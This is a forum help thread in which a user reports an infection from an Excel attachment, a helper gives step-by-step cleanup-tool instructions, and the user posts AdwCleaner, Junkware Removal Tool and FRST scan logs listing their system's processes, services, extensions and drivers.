.xls file infected my computer



#1
mw201

Hi!

 

I recently received a file attached to the work invitation from the Upwork website and I accidentally opened it. It was a .xls file. The next day I was notified by Upwork that the file contained a virus. It infected my computer and Avast antivirus could not detect it. I tried to delete the file but it didn't help. What are my options?




#2
RKinner

    Malware Expert

 
Download AdwCleaner to your desktop. Make sure you get the correct Download button. Sometimes the ads on BleepingComputer will mimic the real Download button, which should say: Download Now @BleepingComputer
 
NOTE: If using Internet Explorer and you get an alert that stops the program downloading, click on the warning and allow the download to complete.
 
Close  all programs, pause your anti-virus and run AdwCleaner (Vista or Win 7 => right click and Run As Administrator).
 
Click on Scan  and follow the prompts. Let it run unhindered. When done, click on the Clean button, and follow the prompts. Allow the system to reboot. You will then be presented with the report. Copy & Paste this report on your next reply.
 
The report will be saved in the C:\AdwCleaner folder.
 
 
 
Junkware-Removal-Tool
 
Please download Junkware Removal Tool to your desktop.  Make sure you get the correct Download button.  Sometimes the ads on BleepingComputer will mimic the real Download button which should say: Download Now @Author's site
  • Pause your anti-virus.  Close all browsers.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

  • Get FRST from http://www.bleepingc...very-scan-tool/ You need to download the appropriate tool for your PC. If you don't know if you have a 32 or 64 bit system, get them both. Only one will work and that's the right one.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer. 
  • Check the Addition.txt box
  • Press Scan button. 
  • It will produce a log called FRST.txt in the same directory the tool is run from.  
  • Please copy and paste log back here. 
  • It will generate another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply. 


    #3
    mw201


    Thank you for your post, RKinner!

    Here is what I have from ADWCleaner:

     

    # AdwCleaner v6.042 - Logfile created 01/02/2017 at 17:06:32
    # Updated on 06/01/2017 by Malwarebytes
    # Database : 2017-01-06.1 [Local]
    # Operating System : Windows 10 Home  (X64)
    # Username : Joseph - JOSEPHW
    # Running from : C:\Users\Joseph\Downloads\AdwCleaner.exe
    # Mode: Scan
     
     
     
    ***** [ Services ] *****
     
    No malicious services found.
     
     
    ***** [ Folders ] *****
     
    No malicious folders found.
     
     
    ***** [ Files ] *****
     
    No malicious files found.
     
     
    ***** [ DLL ] *****
     
    No malicious DLLs found.
     
     
    ***** [ WMI ] *****
     
    No malicious keys found.
     
     
    ***** [ Shortcuts ] *****
     
    No infected shortcut found.
     
     
    ***** [ Scheduled Tasks ] *****
     
    Task Found:  6ov
     
     
    ***** [ Registry ] *****
     
    No malicious registry entries found.
     
     
    ***** [ Web browsers ] *****
     
    No malicious Firefox based browser items found.
    No malicious Chromium based browser items found.
     
    *************************
     
    C:\AdwCleaner\AdwCleaner[S0].txt - [978 Bytes] - [01/02/2017 17:06:32]
     
    ########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1050 Bytes] ##########
     
     
     
     
     
     
     
    Junkware Removal Tool
     
    The first time I ran this I thought I accidentally closed it before it finished the scan, so I ran it 2 times. Here are the contents of the file produced:
     
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.1.0 (12.05.2016)
    Operating System: Windows 10 Home x64 
    Ran by Joseph (Administrator) on Wed 02/01/2017 at 17:24:32.50
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
     
     
    File System: 0 
     
     
     
     
    Registry: 0 
     
     
     
     
     
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on Wed 02/01/2017 at 17:27:48.55
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
    Farbar Recovery Scan Tool
     
    First:
     
    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-01-2017
    Ran by Joseph (administrator) on JOSEPHW (01-02-2017 17:45:56)
    Running from C:\Users\Joseph\Downloads
    Loaded Profiles: Joseph (Available Profiles: Joseph)
    Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
     
    ==================== Processes (Whitelisted) =================
     
    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
     
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe
    (Intel Corporation) C:\Windows\System32\igfxCUIService.exe
    (Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
    (HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
    (Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
    (Intel Corporation) C:\Windows\System32\ibtsiva.exe
    (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
    () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
    Failed to access process -> IntelCpHDCPSvc.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
    (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
    (WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
    (HP Inc.) C:\Program Files\HPCommRecovery\HPCommRecovery.exe
    (HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
    (Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
    (Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    () C:\Users\Joseph\Downloads\AdwCleaner.exe
    () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
    (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
    (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdwtxcr.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
    (Microsoft Corporation) C:\Windows\System32\smartscreen.exe
     
    ==================== Registry (Whitelisted) ====================
     
    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
     
    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9181696 2017-01-13] (Realtek Semiconductor)
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
    HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27262432 2016-12-20] (Skype Technologies S.A.)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [HP Photosmart 6520 series (NET)] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
    HKU\S-1-5-18\...\RunOnce: [Application Restart #0] => C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe [371928 2016-07-16] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    Startup: C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-10-31]
    ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)
     
    ==================== Internet (Whitelisted) ====================
     
    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
     
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{f314d896-c550-4d14-b773-fdf73ec6770f}: [DhcpNameServer] 192.168.1.1
     
    Internet Explorer:
    ==================
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-12-28] (Microsoft Corporation)
    BHO: No Name -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> No File
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-12-28] (Microsoft Corporation)
    BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
    Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
     
    FireFox:
    ========
    FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-01-19]
    FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [not signed]
    FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
    FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.)
    FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2016-09-05] (Citrix Systems, Inc.)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-12-28] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
    FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2015-12-22] ()
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)
     
    Chrome: 
    =======
    CHR Profile: C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default [2017-02-01]
    CHR Extension: (Google Docs) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-09-24]
    CHR Extension: (Google Drive) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-24]
    CHR Extension: (YouTube) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-22]
    CHR Extension: (Bitdefender Wallet) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gannpgaobkkhmpomoijebaigcapoeebl [2017-02-01]
    CHR Extension: (Google Docs Offline) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-22]
    CHR Extension: (AdBlock) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-01-31]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
    CHR Extension: (Gmail) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-22]
    CHR Extension: (Chrome Media Router) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-04]
    CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx
     
    ==================== Services (Whitelisted) ====================
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
    R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3699904 2016-12-28] (Microsoft Corporation)
    S2 cplspcon; C:\WINDOWS\system32\IntelCpHDCPSvc.exe [431088 2016-09-25] (Intel Corporation)
    S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    R2 DevMgmtService; C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe [100448 2016-11-29] (Bitdefender)
    R2 esifsvc; C:\WINDOWS\SysWoW64\esif_uf.exe [1419424 2016-09-25] (Intel Corporation)
    R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [349728 2015-12-22] (WildTangent)
    R2 HP Comm Recover; C:\Program Files\HPCommRecovery\HPCommRecovery.exe [48128 2016-04-18] (HP Inc.) [File not signed]
    R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
    R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-01-11] (HP Inc.)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [19440 2015-11-04] (Intel Corporation)
    R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [356336 2016-09-25] (Intel Corporation)
    S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [976848 2016-01-14] (Intel® Corporation)
    S3 Intel® WiDi SAM; C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [19088 2015-09-17] (Intel Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [209184 2016-02-11] (Intel Corporation)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
    S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-08-04] ()
    R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1100392 2016-10-28] (Bitdefender)
    R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
    R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [322560 2017-01-13] (Realtek Semiconductor)
    R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [266872 2016-08-19] (Synaptics Incorporated)
    R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-01-06] (Bitdefender)
    R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1526528 2017-01-11] (Bitdefender)
    R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
    S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
    R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-08-04] (Intel® Corporation)
    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
     
    ===================== Drivers (Whitelisted) ======================
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
    R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
    R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
    S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
    R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
    R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
    R3 dptf_cpu; C:\WINDOWS\System32\drivers\dptf_cpu.sys [52208 2016-09-25] (Intel Corporation)
    R3 esif_lf; C:\WINDOWS\system32\DRIVERS\esif_lf.sys [260080 2016-09-25] (Intel Corporation)
    R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
    R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [345872 2016-05-26] (Intel Corporation)
    R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [309280 2016-11-17] (Bitdefender)
    R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251848 2017-02-01] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [91584 2017-01-24] (Malwarebytes)
    S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
    U5 Netwtw02; C:\Windows\System32\Drivers\Netwtw02.sys [6724368 2016-02-06] (Intel Corporation)
    R3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7308560 2016-09-13] (Intel Corporation)
    R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [935168 2016-01-19] (Realtek                                            )
    S3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [769752 2016-01-20] (Realsil Semiconductor Corporation)
    S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [413912 2016-01-20] (Realsil Semiconductor Corporation)
